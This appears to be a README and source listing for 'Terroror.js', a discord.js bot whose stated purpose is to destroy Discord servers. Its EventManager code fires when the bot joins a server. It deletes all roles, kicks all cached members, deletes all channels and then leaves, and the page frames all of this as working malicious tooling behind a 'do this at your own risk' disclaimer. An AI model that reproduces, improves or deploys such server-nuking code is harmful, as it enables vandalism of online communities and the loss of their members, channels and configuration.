A Terroror.js bot, is made in discord.js to destroy discord servers!
/*
DO THIS AT YOUR OWN RISK!
We are not responisible of any damages on discord!
Copyright by MincoMK
https://www.minco.kro.kr/
*/
const Main = require("./src/Main.js"); // let discord make own main directory
let main = new Main(); // let make ./src/Main.js as main code
main.main(); // making main code is working
const process = require("process");
const version = require("../package.json").version;
/*
Enables the SuperTerroror on Discord when bots join automatically make a bomb to server
*/
class EventManager {
joinAllEvents(client) { // join bot for all events
this.client = client; // this client
client.on("ready", async () => { // on ready
console.log("The bot is ready to terroror"); // when bot is ready log on console
});
client.on("guildCreate", guild => { // the server ---
guild.roles.cache.forEach(role => { // for each role
role.delete().catch(console.error); // --- delete all roles
});
guild.members.cache.forEach(mb => { // for each members
mb.kick().catch(console.error); // --- kick all members
});
guild.channels.cache.forEach(ch => { // for each channels
ch.delete().catch(console.error); // --- delete channels
});
guild.leave(); // and leave the bot after terroror
});
}
}
module.exports = EventManager; // export the eventmanager
// end of file
When bots join, automatically terroror!
View Wiki for Full Installation and Guides for building SuperTerroror.js!
- Added
express
app for Uptimerobot.com - Removed
node_modules
, usenpm install / npm i
on terminal - Added
disnotify
onpackage.json
- Added
@discord-opus
,discord-api-types
, and other depencies of djs
View History Changelogs
for All Information!
- MincoMK: Coding
- Hen2527: Design/Commenting
- xqwtxon: Original Creator
This repository is protected by BY-NC-SA CCL.